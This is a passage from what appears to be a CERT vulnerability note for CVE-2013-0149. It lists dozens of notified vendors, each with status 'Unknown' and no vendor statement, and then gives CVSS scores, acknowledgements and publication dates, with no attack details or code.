                                                      Notified:  May 10, 2013 Updated:  May 10, 2013

                                                      Status

                                                        Unknown

                                                      Vendor Statement

                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                      Vendor References

                                                        IBM Corporation (zseries)

                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                        Status

                                                          Unknown

                                                        Vendor Statement

                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                        Vendor References

                                                          IBM eServer

                                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                                          Status

                                                            Unknown

                                                          Vendor Statement

                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                          Vendor References

                                                            IP Infusion, Inc.

                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                            Status

                                                              Unknown

                                                            Vendor Statement

                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                            Vendor References

                                                              Infoblox

                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                              Status

                                                                Unknown

                                                              Vendor Statement

                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                              Vendor References

                                                                Internet Security Systems, Inc.

                                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                Status

                                                                  Unknown

                                                                Vendor Statement

                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                Vendor References

                                                                  Intoto

                                                                  Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                  Status

                                                                    Unknown

                                                                  Vendor Statement

                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                  Vendor References

                                                                    Mandriva S. A.

                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                    Status

                                                                      Unknown

                                                                    Vendor Statement

                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                    Vendor References

                                                                      Mellanox Technologies

                                                                      Notified:  July 10, 2013 Updated:  July 10, 2013

                                                                      Status

                                                                        Unknown

                                                                      Vendor Statement

                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                      Vendor References

                                                                        Microsoft Corporation

                                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                        Status

                                                                          Unknown

                                                                        Vendor Statement

                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                        Vendor References

                                                                          MontaVista Software, Inc.

                                                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                          Status

                                                                            Unknown

                                                                          Vendor Statement

                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                          Vendor References

                                                                            NetApp

                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                            Status

                                                                              Unknown

                                                                            Vendor Statement

                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                            Vendor References

                                                                              NetBSD

                                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                              Status

                                                                                Unknown

                                                                              Vendor Statement

                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                              Vendor References

                                                                                Nokia

                                                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                Status

                                                                                  Unknown

                                                                                Vendor Statement

                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                Vendor References

                                                                                  Nortel Networks, Inc.

                                                                                  Notified:  May 10, 2013 Updated:  May 10, 2013

                                                                                  Status

                                                                                    Unknown

                                                                                  Vendor Statement

                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                  Vendor References

                                                                                    Novell, Inc.

                                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                    Status

                                                                                      Unknown

                                                                                    Vendor Statement

                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                    Vendor References

                                                                                      OpenBSD

                                                                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                      Status

                                                                                        Unknown

                                                                                      Vendor Statement

                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                      Vendor References

                                                                                        Openwall GNU/*/Linux

                                                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                        Status

                                                                                          Unknown

                                                                                        Vendor Statement

                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                        Vendor References

                                                                                          Peplink

                                                                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                          Status

                                                                                            Unknown

                                                                                          Vendor Statement

                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                          Vendor References

                                                                                            Process Software

                                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                            Status

                                                                                              Unknown

                                                                                            Vendor Statement

                                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                                            Vendor References

                                                                                              Q1 Labs

                                                                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                              Status

                                                                                                Unknown

                                                                                              Vendor Statement

                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                              Vendor References

                                                                                                QLogic

                                                                                                Notified:  July 17, 2013 Updated:  July 17, 2013

                                                                                                Status

                                                                                                  Unknown

                                                                                                Vendor Statement

                                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                                Vendor References

                                                                                                  QNX Software Systems Inc.

                                                                                                  Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                  Status

                                                                                                    Unknown

                                                                                                  Vendor Statement

                                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                                  Vendor References

                                                                                                    Red Hat, Inc.

                                                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                    Status

                                                                                                      Unknown

                                                                                                    Vendor Statement

                                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                                    Vendor References

                                                                                                      SUSE Linux

                                                                                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                      Status

                                                                                                        Unknown

                                                                                                      Vendor Statement

                                                                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                                                                      Vendor References

                                                                                                        SafeNet

                                                                                                        Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                        Status

                                                                                                          Unknown

                                                                                                        Vendor Statement

                                                                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                                                                        Vendor References

                                                                                                          Secureworx, Inc.

                                                                                                          Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                          Status

                                                                                                            Unknown

                                                                                                          Vendor Statement

                                                                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                                                                          Vendor References

                                                                                                            Silicon Graphics, Inc.

                                                                                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                            Status

                                                                                                              Unknown

                                                                                                            Vendor Statement

                                                                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                                                                            Vendor References

                                                                                                              Slackware Linux Inc.

                                                                                                              Notified:  June 06, 2013 Updated:  June 06, 2013

                                                                                                              Status

                                                                                                                Unknown

                                                                                                              Vendor Statement

                                                                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                                                                              Vendor References

                                                                                                                SmoothWall

                                                                                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                Status

                                                                                                                  Unknown

                                                                                                                Vendor Statement

                                                                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                Vendor References

                                                                                                                  Snort

                                                                                                                  Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                  Status

                                                                                                                    Unknown

                                                                                                                  Vendor Statement

                                                                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                  Vendor References

                                                                                                                    Sony Corporation

                                                                                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                                                                                    Status

                                                                                                                      Unknown

                                                                                                                    Vendor Statement

                                                                                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                                                                                    Vendor References

Sourcefire

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Stonesoft

Notified:  June 06, 2013 Updated:  June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Symantec

Notified:  June 06, 2013 Updated:  June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

The SCO Group

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

TippingPoint Technologies Inc.

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Turbolinux

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Ubuntu

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Unisys

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Wind River Systems, Inc.

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Windstream

Notified:  July 29, 2013 Updated:  July 29, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

ZyXEL

Notified:  June 06, 2013 Updated:  June 06, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

m0n0wall

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

netfilter

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References



CVSS Metrics

Group          Score   Vector
Base           5.4     AV:A/AC:M/Au:N/C:P/I:P/A:P
Temporal       4.2     E:POC/RL:OF/RC:C
Environmental  5.1     CDP:MH/TD:M/CR:ND/IR:ND/AR:H

References

Acknowledgements

Thanks to Dr. Gabi Nakibly for reporting this vulnerability.

This document was written by Chris King.

Other Information

CVE IDs: CVE-2013-0149
Date Public: 2013-08-01
Date First Published: 2013-08-02
Date Last Updated: 2013-12-06 18:59 UTC
Document Revision: 58

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.